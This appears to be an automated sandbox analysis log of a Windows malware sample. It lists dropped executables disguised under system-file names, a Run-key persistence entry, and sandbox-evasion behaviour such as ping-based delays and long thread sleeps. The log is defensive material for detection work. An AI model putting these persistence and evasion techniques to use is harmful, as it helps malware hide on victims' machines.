                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Portsessionsvc
                                    Source: C:\Users\user\Desktop\EjS7Q5fFCE.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe | Process information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\dwm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe  Process information set: NOOPENFILEERRORBOX (41 identical events)
                                    Source: C:\Windows\Resources\Themes\smartscreen.exe  Process information set: NOOPENFILEERRORBOX (115 identical events)
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe  Process information set: NOOPENFILEERRORBOX (31 identical events)
                                    Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: F20000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1AC70000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 11E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 1AB40000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 2C90000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeMemory allocated: 1AEA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 14E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 1B220000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: DA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\dwm.exeMemory allocated: 1AA90000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: AE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1A4E0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 14F0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1B450000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 9E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1A380000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 8E0000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeMemory allocated: 1A590000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1870000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1B330000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 2B50000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1AD80000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: F50000 memory reserve | memory write watch
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeMemory allocated: 1AB00000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: BB0000 memory reserve | memory write watch
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeMemory allocated: 1A660000 memory reserve | memory write watch
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeCode function: 7_2_00007FFD9BB23688 sldt word ptr [eax]7_2_00007FFD9BB23688
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\dwm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\kwWqKlvO.logJump to dropped file
                                    Source: C:\Windows\Resources\Themes\smartscreen.exeDropped PE file which has not been started: C:\Users\user\Desktop\etRRuFlx.logJump to dropped file
                                    Source: C:\ComproviderComponentIntocommon\Portsessionsvc.exe TID: 8100Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe TID: 4852Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ComproviderComponentIntocommon\ctfmon.exe TID: 3400Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\dwm.exe TID: 3448Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\dwm.exe TID: 7928Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe TID: 7936Thread sleep time: -922337203685477s >= -30000s
